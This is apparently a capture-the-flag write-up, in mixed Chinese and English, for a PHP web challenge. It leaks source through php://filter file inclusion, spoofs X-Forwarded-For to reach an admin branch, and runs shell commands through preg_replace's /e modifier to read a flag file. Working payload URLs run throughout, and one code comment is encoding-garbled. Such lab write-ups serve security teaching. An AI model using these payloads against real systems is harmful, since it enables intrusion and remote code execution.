Offensive and defensive world - ics-05

打开题目场景,Enter the equipment maintenance center,Clicked all the clickable places,It is found that only the device maintenance center can be opened

在源代码中发现page=index

写入参数,Parameters are displayed on the page

有参数的话,可以尝试以下XSS（没有任何反应,失败）

LFI(Local File Inclusion) 本地文件包含漏洞,指的是能打开并包含本地文件的漏洞

LFI漏洞的黑盒判断方法：如果只从URL判断,URL中path、dir、file、pag、page、archive、p、eng、Language files and other related keywords,There may be file inclusion vulnerabilities.

将参数换成index.php之后,返回了OK,All here is a file contains

is the file contains,We try to use pseudo-protocolsphp://

使用php://input可以进行php代码的提交,但是不可行

 所以我们换一种方式,使用php://filter,It can be designed to filter files,We can use it to includeindex.php的文件,to obtain the source code

?page=php://filter/resource=index.php

直接包含发现会直接运行php文件,The source code could not be obtained,include函数会将php文件进行执行,If we encode the incoming file first（base64）pass it on,就会输出它的内容了,Then decode to get the source code

?page=php://filter/read=convert.base64-encode/resource=index.php

Then decode to get a segmenthtml,Get a paragraph from itphp代码

<?php

$page = $_GET[page];//拿到参数

if (isset($page)) {//如果存在



	if (ctype_alnum($page)) { //如果都为字母或者数字
	?>
	
	    <br /><br /><br /><br />
	    <div style="text-align:center">
	        <p class="lead"><?php echo $page; die();?></p>  //输出参数
	        
	    <br /><br /><br /><br />
	
	<?php
	
	}else{
	
	?>
	        <br /><br /><br /><br />
	        <div style="text-align:center">
	            <p class="lead">
	                <?php
	
	                if (strpos($page, 'input') > 0) {//input相当于禁用了
	                    die();
	                }
	
	                if (strpos($page, 'ta:text') > 0) {
	                    die();
	                }
	
	                if (strpos($page, 'text') > 0) {
	                    die();
	                }
	
	                if ($page === 'index.php') {
	                    die('Ok');//为什么返回Ok了
	                }
	                    include($page);//包含参数
	                    die();
	                ?>
	        </p>
	        <br /><br /><br /><br />

<?php
}}


//方便的åžçŽ°è¾“å
¥è¾“出的功能,正在开å‘中的功能，åªèƒ½å†
部人员测试

//None of the above code matters,The real use is here
if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {
//如果请求包中HTTP_X_FORWARDED_FOR为127.0.0.1
    echo "<br >Welcome My Admin ! <br >";

    $pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];

    if (isset($pattern) && isset($replacement) && isset($subject)) {
        preg_replace($pattern, $replacement, $subject);//将subject中匹配pattern的部分用replacement替换
    }else{
        die();
    }

}





?>

ctype_alnum($text)The function will match whether the incoming parameters are all numbers or letters,如果是返回true,否则返回false.

strpos(string,find,start) 函数查找find在另一字符串string中第一次出现的位置（大小写敏感）.

preg_replace($pattern, $replacement, $subject)函数会将subject中匹配pattern的部分用replacement替换,如果启用/e参数的话,就会将replacement当做php代码执行.

不要page参数了,添加X-Forwarded-For:127.0.0.1,页面出现welcome my admin！

 The next use ispreg_replace函数/e漏洞：查看所有文件
payload：/index.php?pat=/abc/e&rep=system("ls")&sub=asdsadasabc

preg_replace()函数的/e漏洞
正确的php system()函数的书写

preg_replace($pattern, $replacement, $subject)
作用：搜索subject中匹配pattern的部分, 以replacement的内容进行替换.
$pattern:       要搜索的模式,可以是字符串或一个字符串数组.
$replacement:   用于替换的字符串或字符串数组.
$subject:       要搜索替换的目标字符串或字符串数组.

简单来说就是替换字符串

Found that command execution is possible,And found suspicious directories,Go into the directory and view the file
payload：/index.php?pat=/abc/e&rep=system("cd%20s3chahahaDir%26%26%20ls")&sub=asdsadasabc
%26为&,这里进行了url编码,Fails without encoding

/index.php?pat=/abc/e&rep=system("cd%20s3chahahaDir/flag%26%26%20ls")&sub=asdsadasabc

 发现flag.php文件,使用cat进行查看：
payload：/index.php?pat=/abc/e&rep=system("cat%20s3chahahaDir/flag/flag.php")&sub=asdsadasabc